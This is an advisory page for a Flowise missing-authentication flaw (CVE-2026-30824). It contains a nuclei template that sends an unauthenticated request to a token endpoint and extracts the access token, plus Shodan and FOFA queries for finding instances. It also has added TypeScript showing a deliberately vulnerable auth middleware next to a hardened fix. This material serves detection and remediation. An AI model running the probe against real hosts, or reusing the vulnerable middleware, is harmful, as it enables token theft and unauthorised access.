Flowise - NVIDIA NIM Endpoints Missing Authentication
CVE-2026-30824
Verified
Description
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.
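The bug class here is a global authentication middleware that exempts an entire router by path prefix, so every endpoint mounted beneath it skips the credential check. The following is an added illustration and not Flowise's code: a dependency-free model of such a middleware with the /api/v1/nvidia-nim prefix from the advisory on its exemption list, beside a hardened variant that canonicalises the path and exempts only an explicit, exact-match set of unprivileged routes. The /api/v1/ping route, the bearer-header handling and the API key are assumptions made for the example.

```typescript
// Added example, not Flowise's code: a dependency-free model of a global auth
// middleware with a route exemption list. The /api/v1/nvidia-nim prefix is the
// one named in the advisory; /api/v1/ping, the header handling and the API key
// are illustrative assumptions.

export interface AuthRequest {
  path: string;                      // request path, may carry a query string
  headers: Record<string, string>;   // header names lower-cased
}

export type Decision = "allow" | "deny";

// Constant-time comparison so a credential check does not leak how many
// leading characters matched through timing.
export function safeEqual(a: string, b: string): boolean {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

function bearerValid(req: AuthRequest, apiKey: string): boolean {
  const auth = req.headers["authorization"] ?? "";
  const tok = /^Bearer\s+(\S+)$/i.exec(auth)?.[1];
  return tok !== undefined && safeEqual(tok, apiKey);
}

// VULNERABLE: exempting a whole router by prefix means every endpoint mounted
// under it, token generation and container management included, never reaches
// the credential check. Prefix matching also over-matches: "/api/v1/ping"
// exempts "/api/v1/pingpong" too.
export const VULNERABLE_EXEMPT_PREFIXES = ["/api/v1/ping", "/api/v1/nvidia-nim"];

export function authorizeVulnerable(req: AuthRequest, apiKey: string): Decision {
  if (VULNERABLE_EXEMPT_PREFIXES.some((p) => req.path.startsWith(p))) return "allow";
  return bearerValid(req, apiKey) ? "allow" : "deny";
}

// Canonicalise before consulting an allowlist: drop query/fragment, collapse
// repeated slashes, strip a trailing slash, lower-case (Express routing is
// case-insensitive by default, so the allowlist comparison should be too).
export function canonicalPath(path: string): string {
  const [first] = path.split(/[?#]/, 1);
  let p = (first ?? path).replace(/\/{2,}/g, "/");
  if (p.length > 1 && p.endsWith("/")) p = p.slice(0, -1);
  return p.toLowerCase();
}

// HARDENED: exemptions are an explicit, exact-match set of unprivileged routes.
// Anything that mints tokens or drives containers is deliberately absent and
// therefore goes through the normal credential check like every other route.
export const HARDENED_EXEMPT_PATHS: ReadonlySet<string> = new Set(["/api/v1/ping"]);

export function authorizeHardened(req: AuthRequest, apiKey: string): Decision {
  if (HARDENED_EXEMPT_PATHS.has(canonicalPath(req.path))) return "allow";
  return bearerValid(req, apiKey) ? "allow" : "deny";
}

// Stand-alone demo on constructed requests.
const KEY = "example-api-key-not-real";
const anon: AuthRequest = { path: "/api/v1/nvidia-nim/get-token", headers: {} };
const authed: AuthRequest = { ...anon, headers: { authorization: `Bearer ${KEY}` } };
console.log("vulnerable, no credentials :", authorizeVulnerable(anon, KEY)); // allow
console.log("hardened,   no credentials :", authorizeHardened(anon, KEY));   // deny
console.log("hardened,   with API key   :", authorizeHardened(authed, KEY)); // allow
```

The point of the hardened variant is not the specific list but its shape: exemptions are enumerated exact paths that carry no privilege, compared after canonicalisation, so adding a new router never silently widens the unauthenticated surface.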
Severity
High
CVSS Score
8.6
Exploit Probability
8%
Affected Product
flowise
Published Date
April 15, 2026
Template Author
dhiyaneshdk
CVE-2026-30824.yaml
id: CVE-2026-30824

info:
  name: Flowise - NVIDIA NIM Endpoints Missing Authentication
  author: DhiyaneshDk
  severity: high
  description: |
    Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.
  impact: |
    Unauthenticated attackers can access privileged container management and token generation, potentially leading to full system compromise.
  remediation: This issue has been patched in version 3.0.13
  reference:
    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454
    - https://nvd.nist.gov/vuln/detail/CVE-2026-30824
    - https://github.com/FlowiseAI/Flowise
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2026-30824
    epss-score: 0.07752
    epss-percentile: 0.91961
    cwe-id: CWE-306
  metadata:
    max-request: 2
    vendor: flowiseai
    product: flowise
    shodan-query: title:"Flowise"
    fofa-query: title="Flowise"
  tags: cve,cve2026,flowise,nvidia,nim,unauth,auth-bypass,token-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/nvidia-nim/get-token"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'access_token','token_type')"
        condition: and

    extractors:
      - type: regex
        name: access_token
        group: 1
        regex:
          - '"access_token"\s*:\s*"([^"]+)"'
        part: body
# digest: 4a0a00473045022100d40e4d7ab8327d0473fe2664304c817f914cbc84bf140f27bb94f135f6a8960102202e2ace5486d6f90a0faaa87e1c4c999b80914022c85672f45a92929068891f7f:922c64590222798bb761d5b6d8e72950
Score
8.6
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CVE ID:
CVE-2026-30824
CWE ID:
CWE-306
Remediation Steps
This issue has been patched in version 3.0.13. Upgrade Flowise to 3.0.13 or later.
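The template's matcher and extractor, carried over into plain TypeScript as an added example (this is neither the template itself nor Flowise code), with the HTTP fetch injected so the decision logic runs offline against constructed responses. The sample bodies, the host name and the token value are constructed; the token format a live instance returns is not documented on this page.

```typescript
// Added example, not the nuclei template and not Flowise code: the template's
// matcher and extractor as plain TypeScript with the HTTP fetch injected, so the
// decision logic can be exercised offline. Sample responses and the host name
// are constructed; the real token format is not documented on this page.

export interface ProbeResponse {
  status: number;
  body: string;
}

export type Fetcher = (url: string) => Promise<ProbeResponse>;

export interface Verdict {
  vulnerable: boolean;
  reason: string;
  tokenPreview?: string;   // redacted; the full token never leaves evaluate()
}

// Same expression as the template's extractor: group 1 of
// "access_token"\s*:\s*"([^"]+)"
export function extractAccessToken(body: string): string | undefined {
  const m = /"access_token"\s*:\s*"([^"]+)"/.exec(body);
  return m?.[1];
}

// Enough of a secret to correlate findings, not enough to reuse it.
export function redact(token: string): string {
  if (token.length <= 8) return "*".repeat(token.length);
  return `${token.slice(0, 4)}...${token.slice(-4)}`;
}

// The template's DSL: status_code == 200 AND contains_all(body, 'access_token',
// 'token_type'). One tightening: a body that mentions the marker words but has
// no extractable token field is reported as a non-finding.
export function evaluate(resp: ProbeResponse): Verdict {
  if (resp.status !== 200) return { vulnerable: false, reason: `HTTP ${resp.status}` };
  if (!(resp.body.includes("access_token") && resp.body.includes("token_type"))) {
    return { vulnerable: false, reason: "marker strings absent" };
  }
  const token = extractAccessToken(resp.body);
  if (token === undefined) return { vulnerable: false, reason: "markers present, no token field" };
  return {
    vulnerable: true,
    reason: "unauthenticated GET /api/v1/nvidia-nim/get-token returned a token",
    tokenPreview: redact(token),
  };
}

export async function probe(baseUrl: string, fetcher: Fetcher): Promise<Verdict> {
  const url = `${baseUrl.replace(/\/+$/, "")}/api/v1/nvidia-nim/get-token`;
  return evaluate(await fetcher(url));
}

// Constructed sample responses (not captured from any host).
export const SAMPLE_VULNERABLE: ProbeResponse = {
  status: 200,
  body: '{"access_token":"EXAMPLE-token-0123456789abcdef","token_type":"Bearer","expires_in":3600}',
};
export const SAMPLE_PATCHED: ProbeResponse = { status: 401, body: '{"error":"Unauthorized"}' };

// Stand-alone demo with a fake fetcher. For a live check pass, for example:
//   (u) => fetch(u).then(async (r) => ({ status: r.status, body: await r.text() }))
const fakeFetcher: Fetcher = async (url) =>
  url.endsWith("/api/v1/nvidia-nim/get-token") ? SAMPLE_VULNERABLE : { status: 404, body: "" };

probe("https://flowise.example.test/", fakeFetcher).then((v) => console.log(JSON.stringify(v)));
```

One operational caveat that follows from the template: its extractor writes the recovered access_token into the scan output, which is why it carries the token-leak tag. Treat nuclei results for this template as sensitive material, and prefer a redacted preview, as evaluate() returns, whenever findings are stored or shared.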